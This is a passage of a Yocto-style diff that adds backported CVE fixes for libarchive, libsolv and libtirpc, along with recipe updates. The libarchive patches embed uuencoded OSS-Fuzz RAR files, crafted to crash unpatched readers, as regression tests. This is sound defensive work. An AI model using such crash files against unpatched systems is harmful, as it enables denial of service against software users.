++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) {
++ return ret;
+ }
+
+ /* Cast to uint32_t will ensure the shift operation will not
+@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r
+ uint16_t filter_type;
+ struct filter_info* filt = NULL;
+ struct rar5* rar = get_context(ar);
++ int ret;
+
+ /* Read the parameters from the input stream. */
+- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start)))
++ return ret;
+
+- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length)))
++ return ret;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type)))
++ return ret;
+
+ filter_type >>= 13;
+ skip_bits(rar, 3);
+@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r
+ if(filter_type == FILTER_DELTA) {
+ int channels;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels)))
++ return ret;
+
+ filt->channels = channels + 1;
+ }
+@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r
+ return ARCHIVE_OK;
+ }
+
+-static int decode_code_length(struct rar5* rar, const uint8_t* p,
+- uint16_t code)
++static int decode_code_length(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint16_t code)
+ {
+ int lbits, length = 2;
++
+ if(code < 8) {
+ lbits = 0;
+ length += code;
+@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar
+ if(lbits > 0) {
+ int add;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add))
++ if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add))
+ return -1;
+
+ length += add;
+@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar
+ continue;
+ } else if(num >= 262) {
+ uint16_t dist_slot;
+- int len = decode_code_length(rar, p, num - 262),
++ int len = decode_code_length(a, rar, p, num - 262),
+ dbits,
+ dist = 1;
+
+@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar
+ uint16_t low_dist;
+
+ if(dbits > 4) {
+- if(ARCHIVE_OK != read_bits_32(
+- rar, p, &add)) {
++ if(ARCHIVE_OK != (ret = read_bits_32(
++ a, rar, p, &add))) {
+ /* Return EOF if we
+ * can't read more
+ * data. */
+- return ARCHIVE_EOF;
++ return ret;
+ }
+
+ skip_bits(rar, dbits - 4);
+@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar
+ /* dbits is one of [0,1,2,3] */
+ int add;
+
+- if(ARCHIVE_OK != read_consume_bits(rar,
+- p, dbits, &add)) {
++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar,
++ p, dbits, &add))) {
+ /* Return EOF if we can't read
+ * more data. */
+- return ARCHIVE_EOF;
++ return ret;
+ }
+
+ dist += add;
+@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar
+ return ARCHIVE_FATAL;
+ }
+
+- len = decode_code_length(rar, p, len_slot);
++ len = decode_code_length(a, rar, p, len_slot);
++ if (len == -1) {
++ return ARCHIVE_FATAL;
++ }
++
+ rar->cstate.last_len = len;
+
+ if(ARCHIVE_OK != copy_string(a, len, dist))
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_
+
+ EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read)
++{
++ /* oss fuzz 30448 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar");
++
++ /* Return codes of those calls are ignored, because this sample file
++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++ * errors during processing. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++ EPILOGUE();
++}
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+@@ -0,0 +1,10 @@
++begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar
++M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V
++M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P``
++M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@
++M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@
++M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@
++M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@
++E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(```
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
new file mode 100644
index 0000000000..b5da44ec7b
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
@@ -0,0 +1,121 @@
+From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Fri, 12 Feb 2021 20:18:31 +0100
+Subject: [PATCH] RAR5 reader: fix invalid memory access in some files
+
+RAR5 reader uses several variables to manage the window buffer during
+extraction: the buffer itself (`window_buf`), the current size of the
+window buffer (`window_size`), and a helper variable (`window_mask`)
+that is used to constrain read and write offsets to the window buffer.
+
+Some specially crafted files can force the unpacker to update the
+`window_mask` variable to a value that is out of sync with current
+buffer size. If the `window_mask` will be bigger than the actual buffer
+size, then an invalid access operation can happen (SIGSEGV).
+
+This commit ensures that if the `window_size` and `window_mask` will be
+changed, the window buffer will be reallocated to the proper size, so no
+invalid memory operation should be possible.
+
+This commit contains a test file from OSSFuzz #30442.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++-----
+ libarchive/test/test_read_format_rar5.c | 17 ++++++++++++
+ ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++
+ 4 files changed, 50 insertions(+), 6 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
++ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch
+ }
+ }
+
+- /* If we're currently switching volumes, ignore the new definition of
+- * window_size. */
+- if(rar->cstate.switch_multivolume == 0) {
+- /* Values up to 64M should fit into ssize_t on every
+- * architecture. */
+- rar->cstate.window_size = (ssize_t) window_size;
++ if(rar->cstate.window_size < (ssize_t) window_size &&
++ rar->cstate.window_buf)
++ {
++ /* If window_buf has been allocated before, reallocate it, so
++ * that its size will match new window_size. */
++
++ uint8_t* new_window_buf =
++ realloc(rar->cstate.window_buf, window_size);
++
++ if(!new_window_buf) {
++ archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER,
++ "Not enough memory when trying to realloc the window "
++ "buffer.");
++ return ARCHIVE_FATAL;
++ }
++
++ rar->cstate.window_buf = new_window_buf;
+ }
+
++ /* Values up to 64M should fit into ssize_t on every
++ * architecture. */
++ rar->cstate.window_size = (ssize_t) window_size;
++
+ if(rar->file.solid > 0 && rar->file.solid_window_size == 0) {
+ /* Solid files have to have the same window_size across
+ whole archive. Remember the window_size parameter
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ
+ EPILOGUE();
+ }
+
++DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync)
++{
++ /* oss fuzz 30442 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar");
++
++ /* Return codes of those calls are ignored, because this sample file
++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++ * errors during processing. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, 46)) {}
++
++ EPILOGUE();
++}
++
+ DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary)
+ {
+ char buf[4096];
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+@@ -0,0 +1,11 @@
++begin 644 test_read_format_rar5_window_buf_and_size_desync.rar
++M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1
++M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A
++M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z
++MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!`
++M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!`
++M0$!`0'!,J+:O!IZ-WN4'@`!3*F0`````````````````````````````````
++M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S
++J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!.
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
new file mode 100644
index 0000000000..0e1549f229
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
@@ -0,0 +1,93 @@
+From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 10:13:22 +0100
+Subject: [PATCH] RAR5 reader: add more checks for invalid extraction
+ parameters
+
+Some specially crafted files declare invalid extraction parameters that
+can confuse the RAR5 reader.
+
+One of the arguments is the declared window size parameter that the
+archive file can declare for each file stored in the archive. Some
+crafted files declare window size equal to 0, which is clearly wrong.
+
+This commit adds additional safety checks decreasing the tolerance of
+the RAR5 format.
+
+This commit also contains OSSFuzz sample #30459.
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 10 ++++++++++
+ libarchive/test/test_read_format_rar5.c | 19 +++++++++++++++++++
+ ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu | 7 +++++++
+ 4 files changed, 37 insertions(+)
+ create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+--- libarchive-3.4.2.orig/Makefile.am
++++ libarchive-3.4.2/Makefile.am
+@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
++ libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c
++++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c
+@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc
+ rar->cstate.initialized = 1;
+ }
+
++ /* Don't allow extraction if window_size is invalid. */
++ if(rar->cstate.window_size == 0) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_FILE_FORMAT,
++ "Invalid window size declaration in this file");
++
++ /* This should never happen in valid files. */
++ return ARCHIVE_FATAL;
++ }
++
+ if(rar->cstate.all_filters_applied == 1) {
+ /* We use while(1) here, but standard case allows for just 1
+ * iteration. The loop will iterate if process_block() didn't
+--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c
+@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode
+
+ EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file)
++{
++ /* oss fuzz 30459 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar");
++
++ /* This file is damaged, so those functions should return failure.
++ * Additionally, SIGSEGV shouldn't be raised during execution
++ * of those functions. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++ EPILOGUE();
++}
+--- /dev/null
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+@@ -0,0 +1,7 @@
++begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar
++M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@
++M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@
++M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+
++5$"`OX2`@[.SL[.S_("`@("`@("`@
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
new file mode 100644
index 0000000000..501fcc5848
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
@@ -0,0 +1,29 @@
+From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001
+From: Tim Kientzle <kientzle@acm.org>
+Date: Thu, 24 Mar 2022 10:35:00 +0100
+Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in
+ zipx_lzma_alone_init()
+
+Fixes #1672
+
+CVE: CVE-2022-26280
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff]
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+
+---
+ libarchive/archive_read_support_format_zip.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c
+index 38ada70b5..9d6c900b2 100644
+--- a/libarchive/archive_read_support_format_zip.c
++++ b/libarchive/archive_read_support_format_zip.c
+@@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip)
+ */
+
+ /* Read magic1,magic2,lzma_params from the ZIPX stream. */
+- if((p = __archive_read_ahead(a, 9, NULL)) == NULL) {
++ if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) {
+ archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
+ "Truncated lzma data");
+ return (ARCHIVE_FATAL);
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
new file mode 100644
index 0000000000..980a0e884a
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
@@ -0,0 +1,43 @@
+From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001
+From: obiwac <obiwac@gmail.com>
+Date: Fri, 22 Jul 2022 22:41:10 +0200
+Subject: [PATCH] CVE-2022-36227
+
+libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754)
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5]
+CVE: CVE-2022-36227
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com
+---
+ libarchive/archive_write.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c
+index 98a55fb..7fe88b6 100644
+--- a/libarchive/archive_write.c
++++ b/libarchive/archive_write.c
+@@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a)
+ struct archive_write_filter *f;
+
+ f = calloc(1, sizeof(*f));
++
++ if (f == NULL)
++ return (NULL);
++
+ f->archive = _a;
+ f->state = ARCHIVE_WRITE_FILTER_STATE_NEW;
+ if (a->filter_first == NULL)
+@@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data,
+ a->client_data = client_data;
+
+ client_filter = __archive_write_allocate_filter(_a);
++
++ if (client_filter == NULL)
++ return (ARCHIVE_FATAL);
++
+ client_filter->open = archive_write_client_open;
+ client_filter->write = archive_write_client_write;
+ client_filter->close = archive_write_client_close;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
index 0ab40fc096..728eedc401 100644
--- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
+++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
@@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls,"
EXTRA_OECONF += "--enable-largefile"
-SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz"
+SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \
+ file://CVE-2021-36976-1.patch \
+ file://CVE-2021-36976-2.patch \
+ file://CVE-2021-36976-3.patch \
+ file://CVE-2021-23177.patch \
+ file://CVE-2021-31566-01.patch \
+ file://CVE-2021-31566-02.patch \
+ file://CVE-2022-26280.patch \
+ file://CVE-2022-36227.patch \
+"
SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451"
SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176"
+# upstream-wontfix: upstream has documented that reported function is not thread-safe
+CVE_CHECK_WHITELIST += "CVE-2023-30571"
+
inherit autotools update-alternatives pkgconfig
CPPFLAGS += "-I${WORKDIR}/extra-includes"
diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb
index 28c84af7ad..cbb38674b9 100644
--- a/meta/recipes-extended/libnsl/libnsl2_git.bb
+++ b/meta/recipes-extended/libnsl/libnsl2_git.bb
@@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}"
SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3"
-SRC_URI = "git://github.com/thkukuk/libnsl \
+SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb
index a1d914e871..0ec64544be 100644
--- a/meta/recipes-extended/libnss-nis/libnss-nis.bb
+++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb
@@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
SECTION = "libs"
DEPENDS += "libtirpc libnsl2"
-PV = "3.1+git${SRCPV}"
+PV = "3.2"
-SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad"
+SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59"
-SRC_URI = "git://github.com/thkukuk/libnss_nis \
+SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
new file mode 100644
index 0000000000..fa577fd533
--- /dev/null
+++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
@@ -0,0 +1,82 @@
+From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001
+From: Michael Schroeder <mls@suse.de>
+Date: Mon, 14 Dec 2020 11:12:00 +0100
+Subject: [PATCH] testcase_read: error out if repos are added or the system is
+ changed too late
+
+We must not add new solvables after the considered map was created, the solver
+was created, or jobs were added. We may not changed the system after jobs have
+been added.
+
+(Jobs may point inside the whatproviedes array, so we must not invalidate this
+area.)
+
+Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec]
+CVE: CVE-2021-3200
+CVE: CVE-2021-33928
+CVE: CVE-2021-33929
+CVE: CVE-2021-33930
+CVE: CVE-2021-33938
+CVE: CVE-2021-44568
+CVE: CVE-2021-44569
+CVE: CVE-2021-44570
+CVE: CVE-2021-44571
+CVE: CVE-2021-44573
+CVE: CVE-2021-44574
+CVE: CVE-2021-44575
+CVE: CVE-2021-44576
+CVE: CVE-2021-44577
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ ext/testcase.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ext/testcase.c b/ext/testcase.c
+index 0be7a213..8fb6d793 100644
+--- a/ext/testcase.c
++++ b/ext/testcase.c
+@@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ Id *genid = 0;
+ int ngenid = 0;
+ Queue autoinstq;
++ int oldjobsize = job ? job->count : 0;
+
+ if (resultp)
+ *resultp = 0;
+@@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ int prio, subprio;
+ const char *rdata;
+
++ if (pool->considered)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled");
++ continue;
++ }
++ if (solv)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created");
++ continue;
++ }
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created");
++ continue;
++ }
+ prepared = 0;
+ if (!poolflagsreset)
+ {
+@@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ int i;
+
+ /* must set the disttype before the arch */
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created");
++ continue;
++ }
+ prepared = 0;
+ if (strcmp(pieces[2], "*") != 0)
+ {
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
index 265a27c00d..2c2aedc32c 100644
--- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
+++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for solving packages and reading repositories"
+DESCRIPTION = "This is libsolv, a free package dependency solver using a satisfiability algorithm for solving packages and reading repositories"
HOMEPAGE = "https://github.com/openSUSE/libsolv"
BUGTRACKER = "https://github.com/openSUSE/libsolv/issues"
SECTION = "devel"
@@ -7,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8"
DEPENDS = "expat zlib"
-SRC_URI = "git://github.com/openSUSE/libsolv.git \
+SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \
+ file://CVE-2021-3200.patch \
"
SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378"
diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
new file mode 100644
index 0000000000..c78e7ef4d5
--- /dev/null
+++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
@@ -0,0 +1,155 @@
+From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 28 Jul 2022 09:11:04 +0530
+Subject: [PATCH] CVE-2021-46828
+
+Upstream-Status: Backport [http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed}
+CVE: CVE-2021-46828
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/svc.c | 17 +++++++++++++-
+ src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++-
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/svc.c b/src/svc.c
+index 6db164b..3a8709f 100644
+--- a/src/svc.c
++++ b/src/svc.c
+@@ -57,7 +57,7 @@
+
+ #define max(a, b) (a > b ? a : b)
+
+-static SVCXPRT **__svc_xports;
++SVCXPRT **__svc_xports;
+ int __svc_maxrec;
+
+ /*
+@@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock)
+ rwlock_unlock (&svc_fd_lock);
+ }
+
++int
++svc_open_fds()
++{
++ int ix;
++ int nfds = 0;
++
++ rwlock_rdlock (&svc_fd_lock);
++ for (ix = 0; ix < svc_max_pollfd; ++ix) {
++ if (svc_pollfd[ix].fd != -1)
++ nfds++;
++ }
++ rwlock_unlock (&svc_fd_lock);
++ return (nfds);
++}
++
+ /*
+ * Add a service program to the callout list.
+ * The dispatch routine will be called when a rpc request for this
+diff --git a/src/svc_vc.c b/src/svc_vc.c
+index c23cd36..1729963 100644
+--- a/src/svc_vc.c
++++ b/src/svc_vc.c
+@@ -64,6 +64,8 @@
+
+
+ extern rwlock_t svc_fd_lock;
++extern SVCXPRT **__svc_xports;
++extern int svc_open_fds();
+
+ static SVCXPRT *makefd_xprt(int, u_int, u_int);
+ static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *);
+@@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *);
+ static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in);
+ static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq,
+ void *in);
++static int __svc_destroy_idle(int timeout);
+
+ struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */
+ u_int sendsize;
+@@ -312,13 +315,14 @@ done:
+ return (xprt);
+ }
+
++
+ /*ARGSUSED*/
+ static bool_t
+ rendezvous_request(xprt, msg)
+ SVCXPRT *xprt;
+ struct rpc_msg *msg;
+ {
+- int sock, flags;
++ int sock, flags, nfds, cnt;
+ struct cf_rendezvous *r;
+ struct cf_conn *cd;
+ struct sockaddr_storage addr;
+@@ -378,6 +382,16 @@ again:
+
+ gettimeofday(&cd->last_recv_time, NULL);
+
++ nfds = svc_open_fds();
++ if (nfds >= (_rpc_dtablesize() / 5) * 4) {
++ /* destroy idle connections */
++ cnt = __svc_destroy_idle(15);
++ if (cnt == 0) {
++ /* destroy least active */
++ __svc_destroy_idle(0);
++ }
++ }
++
+ return (FALSE); /* there is never an rpc msg to be processed */
+ }
+
+@@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock)
+ {
+ return FALSE;
+ }
++
++static int
++__svc_destroy_idle(int timeout)
++{
++ int i, ncleaned = 0;
++ SVCXPRT *xprt, *least_active;
++ struct timeval tv, tdiff, tmax;
++ struct cf_conn *cd;
++
++ gettimeofday(&tv, NULL);
++ tmax.tv_sec = tmax.tv_usec = 0;
++ least_active = NULL;
++ rwlock_wrlock(&svc_fd_lock);
++
++ for (i = 0; i <= svc_max_pollfd; i++) {
++ if (svc_pollfd[i].fd == -1)
++ continue;
++ xprt = __svc_xports[i];
++ if (xprt == NULL || xprt->xp_ops == NULL ||
++ xprt->xp_ops->xp_recv != svc_vc_recv)
++ continue;
++ cd = (struct cf_conn *)xprt->xp_p1;
++ if (!cd->nonblock)
++ continue;
++ if (timeout == 0) {
++ timersub(&tv, &cd->last_recv_time, &tdiff);
++ if (timercmp(&tdiff, &tmax, >)) {
++ tmax = tdiff;
++ least_active = xprt;
++ }
++ continue;
++ }
++ if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) {
++ __xprt_unregister_unlocked(xprt);
++ __svc_vc_dodestroy(xprt);
++ ncleaned++;
++ }
++ }
